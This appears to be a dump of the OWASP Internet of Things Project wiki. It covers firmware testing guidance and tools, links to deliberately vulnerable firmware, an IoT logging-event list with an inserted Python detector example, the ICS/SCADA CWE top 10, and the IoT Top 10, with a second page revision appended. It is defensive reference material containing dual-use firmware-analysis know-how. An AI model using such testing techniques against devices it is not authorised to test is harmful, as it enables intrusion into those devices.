The Firmware Analysis Project is intended to provide security testing guidance for the IoT Attack Surface "Device Firmware":<br />
<br />
{| class="wikitable" style="text-align: left" border="1"<br />
! Section<br />
! <br />
|- <br />
|<br />
Device Firmware Vulnerabilities<br />
|<br />
* Out-of-date core components<br />
* Unsupported core components<br />
* Expired and/or self-signed certificates<br />
* Same certificate used on multiple devices<br />
* Admin web interface concerns<br />
* Hardcoded or easy to guess credentials<br />
* Sensitive information disclosure<br />
* Sensitive URL disclosure<br />
* Encryption key exposure<br />
* Backdoor accounts<br />
* Vulnerable services (web, ssh, tftp, etc.)<br />
|-<br />
|<br />
Manufacturer Recommendations<br />
|<br />
* Ensure that supported and up-to-date software is used by developers<br />
* Ensure that robust update mechanisms are in place for devices<br />
* Ensure that certificates are not duplicated across devices and product lines.<br />
* Develop a mechanism to ensure a new certificate is installed when old ones expire<br />
* Disable deprecated SSL versions<br />
* Ensure developers do not code in easy to guess or common admin passwords<br />
* Ensure services such as SSH have a secure password created<br />
* Develop a mechanism that requires the user to create a secure admin password during initial device setup<br />
* Ensure developers do not hard code passwords or hashes<br />
* Have source code reviewed by a third party before releasing device to production<br />
* Ensure industry standard encryption or strong hashing is used<br />
|-<br />
|<br />
Device Firmware Guidance and Instruction<br />
|<br />
* Firmware file analysis<br />
* Firmware extraction<br />
* Dynamic binary analysis<br />
* Static binary analysis<br />
* Static code analysis<br />
* Firmware emulation<br />
* File system analysis<br />
|-<br />
|<br />
Device Firmware Tools<br />
|<br />
* [https://github.com/craigz28/firmwalker Firmwalker] <br />
* [https://code.google.com/archive/p/firmware-mod-kit/ Firmware Modification Kit]<br />
* [https://github.com/angr/angr Angr binary analysis framework]<br />
* [http://binwalk.org/ Binwalk firmware analysis tool]<br />
* [http://www.binaryanalysis.org/en/home Binary Analysis Tool]<br />
* [https://github.com/firmadyne/firmadyne Firmadyne]<br />
* Firmware Analysis Comparison Toolkit<br />
* [https://gitlab.com/bytesweep/bytesweep ByteSweep]<br />
|-<br />
|<br />
Vulnerable Firmware<br />
|<br />
* [https://github.com/praetorian-inc/DVRF Damn Vulnerable Router Firmware]<br />
* [https://github.com/scriptingxss/IoTGoat OWASP IoTGoat]<br />
|-<br />
|}<br />
<br />
=== Firmware Security Testing Methodology ===<br />
{{Social Media Links}}<br />
<br />
| style="padding-left:25px;width:300px;border-right: 1px dotted gray;padding-right:25px;" valign="top" |<br />
<br />
== What is the Firmware Analysis Project? ==<br />
<br />
The Firmware Analysis Project provides:<br />
<br />
* Security testing guidance for vulnerabilities in the "Device Firmware" attack surface<br />
* Steps for extracting file systems from various firmware files<br />
* Guidance on searching a file system for sensitive or interesting data<br />
* Information on static analysis of firmware contents<br />
* Information on dynamic analysis of emulated services (e.g. web admin interface)<br />
* Testing tool links<br />
* A site for pulling together existing information on firmware analysis<br />
<br />
== Project Leaders ==<br />
<br />
* Craig Smith<br />
<br />
== Related Projects ==<br />
<br />
* [[OWASP_Mobile_Security_Project|OWASP Mobile Security]]<br />
* [[OWASP_Top_Ten_Project|OWASP Web Top 10]]<br />
* [https://www.owasp.org/index.php/OWASP_Embedded_Application_Security OWASP Embedded Application Security Project]<br />
<br />
== Collaboration ==<br />
[https://owasp-iot-security.slack.com The Slack Channel]<br />
<br />
== Resources ==<br />
* [https://www.owasp.org/index.php/IoT_Firmware_Analysis IoT Firmware Analysis Primer]<br />
* [https://otalliance.org/initiatives/internet-things Online Trust Alliance - Internet of Things]<br />
* [https://people.debian.org/~aurel32/qemu/ Pre-compiled QEMU images]<br />
* [https://code.google.com/archive/p/firmware-mod-kit/ Firmware Modification Kit]<br />
* [https://craigsmith.net/episode-11-1-firmware-extraction/ Short Firmware Extraction Video]<br />
* [https://craigsmith.net/episode-12-1-firmware-emulation-with-qemu/ Firmware Emulation with QEMU]<br />
* [https://craigsmith.net/episode-18-1-file-extraction-from-network-capture/ File Extraction from Network Capture]<br />
<br />
== News and Events ==<br />
* Coming Soon<br />
<br />
|}<br />
<br />
= IoT Event Logging Project=<br />
<br />
<div style="width:100%;height:160px;border:0,margin:0;overflow: hidden;">[[File: OWASP_Project_Header.jpg|link=]]</div><br />
<br />
{| style="padding: 0;margin:0;margin-top:10px;text-align:left;" |-<br />
| style="border-right: 1px dotted gray;padding-right:25px;" valign="top" |<br />
<br />
== IoT Logging Events==<br />
<br />
This is a working draft of the recommended minimum IoT Device logging events. This includes many different types of devices, including consumer IoT, enterprise IoT, and ICS/SCADA type devices.<br />
<br />
{| class="wikitable" style="text-align: left" border="1"<br />
! Event Category<br />
! Events<br />
|-<br />
| '''Request Exceptions'''<br />
|<br />
* Attempt to Invoke Unsupported HTTP Method<br />
* Unexpected Quantity of Characters in Parameter<br />
* Unexpected Type of Characters in Parameter<br />
|-<br />
| '''Authentication Exceptions'''<br />
|<br />
* Multiple Failed Passwords<br />
* High Rate of Login Attempts<br />
* Additional POST Variable<br />
* Deviation from Normal GEO Location<br />
|-<br />
| '''Session Exceptions'''<br />
|<br />
* Modifying the Existing Cookie<br />
* Substituting Another User's Valid SessionID or Cookie<br />
* Source Location Changes During Session<br />
|-<br />
| '''Access Control Exceptions'''<br />
|<br />
* Modifying URL Argument Within a GET for Direct Object Access Attempt<br />
* Modifying Parameter Within a POST for Direct Object Access Attempt<br />
* Forced Browsing Attempt<br />
|-<br />
| '''Ecosystem Membership Exceptions'''<br />
|<br />
* Traffic Seen from Disenrolled System<br />
* Traffic Seen from Unenrolled System<br />
* Failed Attempt to Enroll in Ecosystem<br />
* Multiple Attempts to Enroll in Ecosystem<br />
|-<br />
| '''Device Access Events'''<br />
|<br />
* Device Case Tampering Detected<br />
* Device Logic Board Tampering Detected<br />
|-<br />
| '''Administrative Mode Events'''<br />
|<br />
* Device Entered Administrative Mode<br />
* Device Accessed Using Default Administrative Credentials<br />
|-<br />
| '''Input Exceptions'''<br />
|<br />
* Double Encoded Character<br />
* Unexpected Encoding Used<br />
|-<br />
| '''Command Injection Exceptions'''<br />
|<br />
* Blacklist Inspection for Common SQL Injection Values<br />
* Abnormal Quantity of Returned Records<br />
|-<br />
| '''Honey Trap Exceptions'''<br />
|<br />
* Honey Trap Resource Requested<br />
* Honey Trap Data Used<br />
|-<br />
| '''Reputation Exceptions'''<br />
|<br />
* Suspicious or Disallowed User Source Location<br />
<br />
|-<br />
|}<br />
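As an added example (not OWASP project code), a small Python detector that maps raw device log lines onto the event categories in the table above; the log line format, field names such as default_cred, and the thresholds are assumptions.

```python
"""Turn raw IoT device log lines into the event categories of the OWASP IoT
Event Logging draft (Request, Authentication, Session and Administrative Mode
events). Added example, not OWASP project code: the line format
"<ISO time> <kind> key=value ..." and the thresholds are assumptions."""
import re
from collections import defaultdict, deque
from datetime import datetime, timedelta

WINDOW = timedelta(seconds=60)      # assumed sliding window for rate rules
FAILED_PASSWORD_THRESHOLD = 5       # assumed: failures per user per window
LOGIN_RATE_THRESHOLD = 6            # assumed: attempts per source per window
ALLOWED_METHODS = {"GET", "POST", "PUT", "DELETE"}

# Constructed sample log (not captured from a real device).
SAMPLE_LOG = """\
2024-01-01T10:00:00 http method=TRACE path=/ src=10.0.0.5
2024-01-01T10:00:01 login user=admin result=fail src=10.0.0.9
2024-01-01T10:00:02 login user=admin result=fail src=10.0.0.9
2024-01-01T10:00:03 login user=admin result=fail src=10.0.0.9
2024-01-01T10:00:04 login user=admin result=fail src=10.0.0.9
2024-01-01T10:00:05 login user=admin result=fail src=10.0.0.9
2024-01-01T10:00:06 login user=admin result=ok src=10.0.0.9 session=s1 default_cred=true
2024-01-01T10:00:07 admin_mode user=admin src=10.0.0.9 session=s1
2024-01-01T10:00:08 http method=GET path=/status src=10.0.0.9 session=s1
2024-01-01T10:00:09 http method=GET path=/status src=198.51.100.7 session=s1
"""

LINE_RE = re.compile(r"^(\S+) (\w+)((?: \w+=\S+)*)$")


def parse_line(line):
    """Parse one line of the assumed format into (timestamp, kind, fields)."""
    m = LINE_RE.match(line.strip())
    if not m:
        return None
    ts = datetime.fromisoformat(m.group(1))
    fields = dict(kv.split("=", 1) for kv in m.group(3).split())
    return ts, m.group(2), fields


class IoTEventDetector:
    """Stateful rules that emit the draft's event names for incoming lines."""

    def __init__(self):
        self.failures = defaultdict(deque)   # user -> failed-login timestamps
        self.attempts = defaultdict(deque)   # src  -> login-attempt timestamps
        self.session_src = {}                # session id -> first source seen
        self.events = []

    def _emit(self, ts, category, event, detail):
        self.events.append({"time": ts.isoformat(), "category": category,
                            "event": event, "detail": detail})

    @staticmethod
    def _push(window, ts):
        """Record ts, drop entries older than WINDOW, return current count."""
        window.append(ts)
        while window and ts - window[0] > WINDOW:
            window.popleft()
        return len(window)

    def feed(self, ts, kind, fields):
        src = fields.get("src", "?")
        if kind == "http" and fields.get("method") not in ALLOWED_METHODS:
            self._emit(ts, "Request Exceptions",
                       "Attempt to Invoke Unsupported HTTP Method",
                       f"{fields.get('method')} {fields.get('path')} from {src}")
        if kind == "login":
            user = fields.get("user", "?")
            # Fires once, when the sliding-window count reaches the threshold.
            if self._push(self.attempts[src], ts) == LOGIN_RATE_THRESHOLD:
                self._emit(ts, "Authentication Exceptions",
                           "High Rate of Login Attempts",
                           f"{LOGIN_RATE_THRESHOLD} attempts from {src}")
            if fields.get("result") == "fail":
                if self._push(self.failures[user], ts) == FAILED_PASSWORD_THRESHOLD:
                    self._emit(ts, "Authentication Exceptions",
                               "Multiple Failed Passwords",
                               f"{FAILED_PASSWORD_THRESHOLD} failures for {user}")
            elif fields.get("default_cred") == "true":   # assumed device flag
                self._emit(ts, "Administrative Mode Events",
                           "Device Accessed Using Default Administrative Credentials",
                           f"user {user} from {src}")
        if kind == "admin_mode":
            self._emit(ts, "Administrative Mode Events",
                       "Device Entered Administrative Mode",
                       f"user {fields.get('user')} from {src}")
        session = fields.get("session")
        if session:
            first = self.session_src.setdefault(session, src)
            if first != src:
                self._emit(ts, "Session Exceptions",
                           "Source Location Changes During Session",
                           f"session {session}: {first} -> {src}")


def detect(log_text):
    """Run every rule over the log text and return the emitted events in order."""
    det = IoTEventDetector()
    for line in log_text.splitlines():
        parsed = parse_line(line)
        if parsed:
            det.feed(*parsed)
    return det.events


if __name__ == "__main__":
    for e in detect(SAMPLE_LOG):
        print(e["time"], e["category"], "|", e["event"], "|", e["detail"])
```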
<br />
{{Social Media Links}}<br />
<br />
| style="padding-left:25px;width:300px;border-right: 1px dotted gray;padding-right: 25px;" valign="top" |<br />
<br />
== What is the IoT Security Logging Project? ==<br />
<br />
The IoT Secure Logging Project provides a list of core events that should be logged in any IoT-related system. The project exists because IoT systems in general do not log nearly enough events to feed a solid detection and response program around IoT devices, and companies that want to build one have few good resources describing what should be logged.<br />
<br />
== Project Leaders ==<br />
<br />
* Daniel Miessler<br />
<br />
== Related Projects ==<br />
<br />
* [https://www.owasp.org/index.php/OWASP_AppSensor_Project The OWASP AppSensor Project]<br />
<br />
== Collaboration ==<br />
[https://owasp-iot-security.slack.com The Slack Channel]<br />
<br />
== Quick Download ==<br />
* Coming Soon<br />
<br />
== News and Events ==<br />
* Coming Soon<br />
<br />
|}<br />
=ICS/SCADA=<br />
<div style="width:100%;height:160px;border:0,margin:0;overflow: hidden;">[[File:OWASP_Project_Header.jpg|link=]]</div><br />
{| style="padding: 0;margin:0;margin-top:10px;text-align:left;" |-<br />
| valign="top" style="border-right: 1px dotted gray;padding-right:25px;" |<br />
==ICS/SCADA Project==<br />
The OWASP ICS/SCADA Top 10 software weaknesses are as follows:<br />
{| class="wikitable" border="1" style="text-align: left"<br />
!Rank and ID<br />
!Title<br />
|-<br />
|'''1 - CWE-119'''<br />
|<br />
*Improper Restriction of Operations within the Bounds of a Memory Buffer<br />
|-<br />
|'''2 - CWE-20'''<br />
|<br />
*Improper Input Validation<br />
|-<br />
|'''3 - CWE-22'''<br />
|<br />
*Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal')<br />
|-<br />
|'''4 - CWE-264'''<br />
|<br />
*Permissions, Privileges, and Access Controls<br />
|-<br />
|'''5 - CWE-200'''<br />
|<br />
*Information Exposure<br />
|-<br />
|'''6 - CWE-255'''<br />
|<br />
*Credentials Management<br />
|-<br />
|'''7 - CWE-287'''<br />
|<br />
*Improper Authentication<br />
|-<br />
|'''8 - CWE-399'''<br />
|<br />
*Resource Management Errors<br />
|-<br />
|'''9 - CWE-79'''<br />
|<br />
*Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')<br />
|-<br />
|'''10 - CWE-189'''<br />
|<br />
*Numeric Errors<br />
|-<br />
|}<br />
{{Social Media Links}}<br />
| valign="top" style="padding-left:25px;width:300px;border-right: 1px dotted gray;padding-right:25px;" |<br />
==What is the ICS/SCADA Project?==<br />
The ICS/SCADA Project provides:<br />
*A list of the Top 10 most dangerous software weaknesses<br />
==Project Leaders==<br />
*NJ Ouchn<br />
==Related Projects==<br />
*[[OWASP Mobile Security Project|OWASP Mobile Security]]<br />
*[[OWASP Top Ten Project|OWASP Web Top 10]]<br />
==Collaboration==<br />
[https://owasp-iot-security.slack.com/ The Slack Channel]<br />
==Quick Download==<br />
*Coming Soon<br />
==News and Events==<br />
*Coming Soon<br />
|}<div style="width:100%;height:160px;border:0,margin:0;overflow: hidden;"></div><br />
<br />
= Community =<br />
<br />
[https://www.iamthecavalry.org/ I Am The Cavalry] <br />
<br />
A global grassroots organization that is focused on issues where computer security intersects public safety and human life.<br />
<br />
Their areas of focus include:<br />
* Medical devices<br />
* Automobiles<br />
* Home Electronics<br />
* Public Infrastructure<br />
<br />
[https://otalliance.org Online Trust Alliance]<br />
<br />
Formed as an informal industry working group in 2005, today OTA is an Internal Revenue Service (IRS) approved 501c3 charitable organization with the mission to enhance online trust and empower users, while promoting innovation and the vitality of the internet. OTA is a global organization, supported by over 100 organizations, headquartered in Bellevue, Washington, with offices in Washington, DC.<br />
<br />
Addressing the mounting concerns, in January 2015 the Online Trust Alliance established the [https://otalliance.org/initiatives/internet-things IoT Trustworthy Working Group (ITWG)], a multi-stakeholder initiative. The group recognizes that “security and privacy by design” must be a priority from the onset of product development and be addressed holistically. The framework focuses on privacy, security and sustainability. The sustainability pillar is critical, as it looks at the life-cycle issues related to long-term supportability and transfers of ownership of devices and the data collected.<br />
<br />
[https://allseenalliance.org/framework AllSeen Alliance]<br />
<br />
The AllSeen Alliance is a Linux Foundation collaborative project. They're a cross-industry consortium dedicated to enabling the interoperability of billions of devices, services and apps that comprise the Internet of Things. The Alliance supports the AllJoyn Framework, an open source software framework that makes it easy for devices and apps to discover and communicate with each other. Developers can write applications for interoperability regardless of transport layer, manufacturer, and without the need for Internet access. The software has been and will continue to be openly available for developers to download, and runs on popular platforms such as Linux and Linux-based Android, iOS, and Windows, including many other lightweight real-time operating systems.<br />
<br />
[http://www.iiconsortium.org/ The Industrial Internet Consortium (IIC)]<br />
<br />
The Industrial Internet Consortium is the open membership, international not-for-profit consortium that is setting the architectural framework and direction for the Industrial Internet. Founded by AT&T, Cisco, GE, IBM and Intel in March 2014, the consortium’s mission is to coordinate vast ecosystem initiatives to connect and integrate objects with people, processes and data using common architectures, interoperability and open standards.<br />
<br />
[http://securingsmartcities.org/ Securing Smart Cities]<br />
<br />
Securing Smart Cities is a not-for-profit global initiative that aims to solve the existing and future cybersecurity problems of smart cities through collaboration between companies, governments, media outlets, other not-for-profit initiatives and individuals across the world.<br />
<br />
===Talks===<br />
<br />
* RSA Conference San Francisco, April 21, 2015: [https://www.owasp.org/images/5/51/RSAC2015-OWASP-IoT-Miessler.pdf Securing the Internet of Things: Mapping IoT Attack Surface Areas with the OWASP IoT Top 10 Project], Daniel Miessler, Practice Principal<br />
* Defcon 23, August 6-9, 2015: [https://www.owasp.org/images/3/36/IoTTestingMethodology.pdf IoT Attack Surface Mapping], Daniel Miessler<br />
<br />
===Podcasts===<br />
<br />
* [http://iotpodcast.com/ The Internet of Things Podcast]<br />
* [http://www.iot-inc.com/ IoT Inc]<br />
* [https://craigsmith.net/iot-this-week/ IoT This Week]<br />
* [http://farstuff.com/ Farstuff: The Internet of Things Podcast]<br />
<br />
===IoT Conferences===<br />
<br />
* [http://www.iotevents.org Internet of Things Events]<br />
<br />
Conference Call for Papers<br />
* [http://www.wikicfp.com/cfp/servlet/tool.search?q=internet+of+things&year=t WikiCFP - Internet of Things]<br />
* [http://www.wikicfp.com/cfp/servlet/tool.search?q=iot&year=t WikiCFP - IoT]<br />
<br />
<br />
<br />
=Project About=<br />
<br />
{{Template:Project About<br />
| project_name =OWASP Internet of Things Project<br />
| project_description = <br />
| project_license =CC-BY 3.0 for documentation and GPLv3 for code. <br />
| leader_name1 = Daniel Miessler<br />
| leader_email1 = <br />
| leader_username1 = <br />
| leader_name2 =Craig Smith<br />
| leader_email2 = <br />
| leader_username2 = <br />
| contributor_name1 = Justin Klein Keane<br />
| contributor_email1 = <br />
| contributor_username1 = Justin_C._Klein_Keane<br />
| contributor_name2 = Yunsoul<br />
| contributor_email2 = <br />
| contributor_username2 = Yunsoul<br />
| mailing_list_name = <br />
| links_url1 = <br />
| links_name1 =<br />
}} <br />
<br />
<br />
<br />
__NOTOC__ <headertabs></headertabs><br />
<br />
[[Category:OWASP_Project]] <br />
[[Category:OWASP_Document]] <br />
[[Category:OWASP_Download]] <br />
[[Category:OWASP_Release_Quality_Document]]</div>
Aaron.guzman
https://wiki.owasp.org/index.php?title=OWASP_Internet_of_Things_Project&diff=254795 OWASP Internet of Things Project 2019-09-17T23:17:21Z
<p>Aaron.guzman: </p>
<hr />
<div>= Main =<br />
<br />
<div style="width:100%;height:160px;border:0,margin:0;overflow: hidden;">[[File:OWASP_Project_Header.jpg|link=]]</div><br />
<br />
{| style="padding: 0;margin:0;margin-top:10px;text-align:left;" |-<br />
| style="border-right: 1px dotted gray;padding-right:25px;" valign="top" |<br />
== OWASP Internet of Things (IoT) Project ==<br />
Oxford defines the Internet of Things as: “A proposed development of the Internet in which everyday objects have network connectivity, allowing them to send and receive data.”<br />
<br />
''The OWASP Internet of Things Project is designed to help manufacturers, developers, and consumers better understand the security issues associated with the Internet of Things, and to enable users in any context to make better security decisions when building, deploying, or assessing IoT technologies''. <br />
<br />
The project looks to define a structure for various IoT sub-projects such as Attack Surface Areas, Testing Guides and Top Vulnerabilities.<br />
<br />
==Updated!==<br />
<br />
The OWASP IoT Project for 2018 has been released![[File:OWASP 2018 IoT Top10 Final.jpg|center|thumb|1301x1301px]]<br />
<br />
== Philosophy ==<br />
The OWASP Internet of Things Project was started in 2014 as a way to help Developers, Manufacturers, Enterprises, and Consumers to make better decisions regarding the creation and use of IoT systems.<br />
<br />
This continues today with the 2018 release of the OWASP IoT Top 10, which represents the top ten things to avoid when building, deploying, or managing IoT systems. The primary theme for the 2018 OWASP Internet of Things Top 10 is simplicity. Rather than having separate lists for risks vs. threats vs. vulnerabilities—or for developers vs. enterprises vs. consumers—the project team elected to have a single, unified list that captures the top things to avoid when dealing with IoT Security.<br />
<br />
The team recognized that there are now dozens of organizations releasing elaborate guidance on IoT Security—all of which are designed for slightly different audiences and industry verticals. We thought the most useful resource we could create is a single list that addresses the highest priority issues for manufacturers, enterprises, and consumers at the same time.<br />
<br />
The result is the [https://www.owasp.org/images/1/1c/OWASP-IoT-Top-10-2018-final.pdf 2018 OWASP IoT Top 10].<br />
<br />
== Methodology ==<br />
The project team is a collection of volunteer professionals from within the security industry, with experience spanning multiple areas of expertise, including manufacturing, consulting, security testing, development, and many more.<br />
<br />
The project was conducted in the following phases:<br />
# '''Team Formation''': finding people who would be willing to contribute to the 2018 update, both as SMEs and as project leaders to perform various tasks within the duration of the project.<br />
# '''Project Review:''' analysis of the 2014 project to determine what’s changed in the industry since that release, and how the list should be updated given those changes.<br />
# '''Data Collection''': collection and review of multiple vulnerability sources (both public and private), with special emphasis on which issues caused the most actual impact and damage.<br />
# '''Sister Project Review''': a review of dozens of other IoT Security projects to ensure that we’d not missed something major and that we were comfortable with both the content and prioritization of our release. Examples included: [https://cloudsecurityalliance.org/artifacts/csa-iot-controls-matrix/ CSA IoT Controls Matrix], [https://api.ctia.org/wp-content/uploads/2018/08/CTIA-IoT-Cybersecurity-Certification-Test-Plan-V1_0.pdf CTIA], [http://iot.stanford.edu/ Stanford’s Secure Internet of Things Project], [https://nvlpubs.nist.gov/nistpubs/ir/2018/NIST.IR.8200.pdf NISTIR 8200], [https://www.enisa.europa.eu/publications/baseline-security-recommendations-for-iot/at_download/fullReport ENISA IoT Baseline Report], [https://assets.publishing.service.gov.uk/government/uploads/system/uploads/attachment_data/file/747413/Code_of_Practice_for_Consumer_IoT_Security_October_2018.pdf Code of Practice for Consumer IoT Security], and others.<br />
# '''Community Draft Feedback''': release of the draft to the community for review, including multiple Twitter calls for comments, the use of a public feedback form, and a number of public talks where feedback was gathered. The feedback was then reviewed by the team along with initial Data Collection, as well as Sister Project Review, to create the list contents and prioritization.<br />
# '''Release:''' release of the project to the public in December 2018.<br />
<br />
== The Future of the OWASP IoT Top 10 ==<br />
The team has a number of activities planned to continue improving on the project going forward.<br />
<br />
Some of the items being discussed include:<br />
* Continuing to improve the list on a two-year cadence, incorporating feedback from the community and from additional project contributors to ensure we are staying current with issues facing the industry.<br />
* Mapping the list items to other OWASP projects, such as the ASVS, and perhaps to other projects outside OWASP as well.<br />
* Expanding the project into other aspects of IoT—including embedded security, ICS/SCADA, etc.<br />
* Adding use and abuse cases, with multiple examples, to solidify each concept discussed.<br />
* Considering the addition of reference architectures, so we can not only tell people what to avoid, but how to do what they need to do securely.<br />
<br />
Participation in the OWASP IoT Project is open to the community. We take input from all participants — whether you’re a developer, a manufacturer, a penetration tester, or someone just trying to implement IoT securely. You can find the team meeting every other Friday in the #iot-security room of the OWASP Slack Channel.<br />
<br />
'''''The OWASP IoT Security Team, 2018'''''<br />
<br />
==Licensing==<br />
The OWASP Internet of Things Project is free to use. It is licensed under the [http://creativecommons.org/licenses/by-sa/3.0/ Creative Commons Attribution-ShareAlike 3.0 license], so you can copy, distribute and transmit the work, adapt it, and use it commercially, provided that you attribute the work and that, if you alter, transform, or build upon it, you distribute the resulting work only under the same or a similar license.<br />
<br />
{{Social Media Links}}<br />
<br />
| style="padding-left:25px;width:200px;border-right: 1px dotted gray;padding-right:25px;" valign="top" |<br />
<br />
== What is the OWASP Internet of Things Project? ==<br />
<br />
The OWASP Internet of Things Project provides information on:<br />
<br />
* [https://www.owasp.org/index.php/IoT_Attack_Surface_Areas IoT Attack Surface Areas]<br />
* IoT Vulnerabilities<br />
* Firmware Analysis<br />
* ICS/SCADA Software Weaknesses<br />
* Community Information<br />
* [https://www.owasp.org/index.php/IoT_Testing_Guides IoT Testing Guides]<br />
* [https://www.owasp.org/index.php/IoT_Security_Guidance IoT Security Guidance]<br />
* [https://www.owasp.org/index.php/Principles_of_IoT_Security Principles of IoT Security]<br />
* [https://www.owasp.org/index.php/IoT_Framework_Assessment IoT Framework Assessment]<br />
* Developer, Consumer and Manufacturer Guidance<br />
* Design Principles<br />
* IoTGoat<br />
<br />
== Project Leaders ==<br />
<br />
* Daniel Miessler<br />
* Craig Smith<br />
* Vishruta Rudresh<br />
* Aaron Guzman<br />
<br />
== Contributors ==<br />
* [https://www.owasp.org/index.php/User:Justin_C._Klein_Keane Justin Klein Keane]<br />
* Saša Zdjelar<br />
<br />
== IoT Top 2018 Contributors ==<br />
* Vijayamurugan Pushpanathan <br />
* Alexander Lafrenz <br />
* Masahiro Murashima <br />
* Charlie Worrell <br />
* José A. Rivas (jarv) <br />
* Pablo Endres <br />
* Ade Yoseman <br />
* Cédric Levy-Bencheton<br />
* Jason Andress<br />
* Amélie Didion - Designer<br />
<br />
== Related Projects ==<br />
<br />
* [[OWASP_Project|OWASP Project Repository]]<br />
* [[OWASP_Mobile_Security_Project|OWASP Mobile Security]]<br />
* [[OWASP_Top_Ten_Project|OWASP Web Top 10]]<br />
* [https://www.owasp.org/index.php/OWASP_Embedded_Application_Security OWASP Embedded Application Security]<br />
* [https://www.owasp.org/index.php/C-Based_Toolchain_Hardening OWASP C-based Toolchain Hardening]<br />
<br />
| style="padding-left:25px;width:200px;" valign="top" |<br />
<br />
== Collaboration ==<br />
[https://owasp.slack.com The OWASP Slack Channel]<br />
<br />
Hint: If you're new to Slack, [https://lists.owasp.org/pipermail/owasp-community/2015-July/000703.html join OWASP's slack channel first], then join #iot-security within OWASP's channel.<br />
<br />
== Quick Download ==<br />
[https://www.owasp.org/images/1/1c/OWASP-IoT-Top-10-2018-final.pdf OWASP IoT Top Ten 2018]<br />
<br />
[https://www.owasp.org/images/7/7b/IoT_Preso_v1.pptx Quick discussion on IoT]<br />
<br />
[https://www.owasp.org/images/3/36/IoTTestingMethodology.pdf IoT Attack Surface Mapping DEFCON 23]<br />
<br />
[https://www.owasp.org/images/2/2d/Iot_testing_methodology.JPG IoT Testing Guidance Handout]<br />
<br />
[https://www.owasp.org/images/7/71/Internet_of_Things_Top_Ten_2014-OWASP.pdf OWASP IoT Top Ten 2014 PDF]<br />
<br />
[https://www.owasp.org/images/8/8e/Infographic-v1.jpg OWASP IoT Top Ten 2014 Infographic]<br />
<br />
[https://www.owasp.org/images/0/01/Internet_of_Things_Top_Ten_2014-OWASP-ppt.pptx OWASP IoT Top Ten 2014 PPT]<br />
<br />
[https://www.owasp.org/images/5/51/RSAC2015-OWASP-IoT-Miessler.pdf OWASP IoT Top Ten-RSA 2015]<br />
<br />
[https://www.owasp.org/images/b/bd/OWASP-IoT.pptx OWASP IoT Project Overview]<br />
<br />
== News and Events ==<br />
* OWASP [https://www.owasp.org/index.php/OWASP_Internet_of_Things_Project#tab=IoTGoat IoTGoat Project] underway<br />
* IoT ASVS and Testing Guide set to kick off in 2019<br />
* Added a [https://owasp-iot-security.slack.com/ Slack channel]<br />
* Added a sub-project; [https://www.owasp.org/index.php/OWASP_Internet_of_Things_Project#tab=IoT_Security_Policy_Project IoT Security Policy Project]<br />
<br />
==Classifications==<br />
<br />
{| width="200" cellpadding="2"<br />
|-<br />
| rowspan="2" width="50%" valign="top" align="center" | [[File:Owasp-incubator-trans-85.png|link=https://www.owasp.org/index.php/OWASP_Project_Stages#tab=Incubator_Projects]]<br />
| width="50%" valign="top" align="center" | [[File:Owasp-builders-small.png|link=]] <br />
|-<br />
| width="50%" valign="top" align="center" | [[File:Owasp-defenders-small.png|link=]]<br />
|-<br />
| colspan="2" align="center" | [[File:Cc-button-y-sa-small.png|link=http://creativecommons.org/licenses/by-sa/3.0/]]<br />
|-<br />
| colspan="2" align="center" | [[File:Project_Type_Files_DOC.jpg|link=]]<br />
|}<br />
<br />
|}<br />
<br />
= IoT Top 10 =<br />
<div style="width:100%;height:160px;border:0,margin:0;overflow: hidden;">[[File:OWASP_Project_Header.jpg|link=]]</div><br />
<br />
== Internet of Things (IoT) Top 10 2018 ==<br />
The [https://www.owasp.org/images/1/1c/OWASP-IoT-Top-10-2018-final.pdf OWASP IoT Top 10 - 2018] is now available.<br />
* I1 Weak, Guessable, or Hardcoded Passwords<br />
* I2 Insecure Network Services<br />
* I3 Insecure Ecosystem Interfaces<br />
* I4 Lack of Secure Update Mechanism<br />
* I5 Use of Insecure or Outdated Components<br />
* I6 Insufficient Privacy Protection<br />
* I7 Insecure Data Transfer and Storage<br />
* I8 Lack of Device Management<br />
* I9 Insecure Default Settings<br />
* I10 Lack of Physical Hardening<br />
<br />
== Internet of Things (IoT) Top 10 2014 ==<br />
* [[Top 10 2014-I1 Insecure Web Interface|I1 Insecure Web Interface]]<br />
* [[Top 10 2014-I2 Insufficient Authentication/Authorization|I2 Insufficient Authentication/Authorization]]<br />
* [[Top 10 2014-I3 Insecure Network Services|I3 Insecure Network Services]]<br />
* [[Top 10 2014-I4 Lack of Transport Encryption|I4 Lack of Transport Encryption]]<br />
* [[Top 10 2014-I5 Privacy Concerns|I5 Privacy Concerns]]<br />
* [[Top 10 2014-I6 Insecure Cloud Interface|I6 Insecure Cloud Interface]]<br />
* [[Top 10 2014-I7 Insecure Mobile Interface|I7 Insecure Mobile Interface]]<br />
* [[Top 10 2014-I8 Insufficient Security Configurability|I8 Insufficient Security Configurability]]<br />
* [[Top 10 2014-I9 Insecure Software/Firmware|I9 Insecure Software/Firmware]]<br />
* [[Top 10 2014-I10 Poor Physical Security|I10 Poor Physical Security]]<br />
<br />
= OWASP IoT Top 10 2018 Mapping Project =<br />
{| style="padding: 0;margin:0;margin-top:10px;text-align:left;" |-<br />
| style="border-right: 1px dotted gray;padding-right:25px;" valign="top" |<br />
<br />
== IoT Top 10 2018 Mapping Project ==<br />
<br />
The OWASP IoT Mapping Project is intended to provide a mapping of the OWASP IoT Top 10 2018 to industry publications and sister projects. The goal is to provide resources that enable practical uses for the OWASP IoT Top 10. As with all Top 10 lists, it should be used as a first step and expanded upon according to the applicable IoT ecosystem. <br />
<br />
Mappings are structured with control categories, tests, or recommendations in the left column, descriptions in the middle column, and their mapping to the OWASP IoT Top 10 2018 list in the right column. A mapping is not always a one-to-one relation; where no exact match exists, similar recommendations and/or controls are listed. For items that are not applicable to the IoT Top 10 2018 list, "N/A" is provided as the mapping.<br />
<br />
An example mapping of the IoT Top 10 2014 is provided below. <br />
<br />
[[File:2014 2018Mapping.png|center|frameless|746x746px]]<br />
<br />
For additional mappings, please visit the following link: https://scriptingxss.gitbook.io/owasp-iot-top-10-mapping-project/<br />
<br />
{{Social Media Links}}<br />
<br />
| style="padding-left:25px;width:300px;border-right: 1px dotted gray;padding-right:25px;" valign="top" |<br />
<br />
== What is the IoT Top 10 Mapping Project? ==<br />
<br />
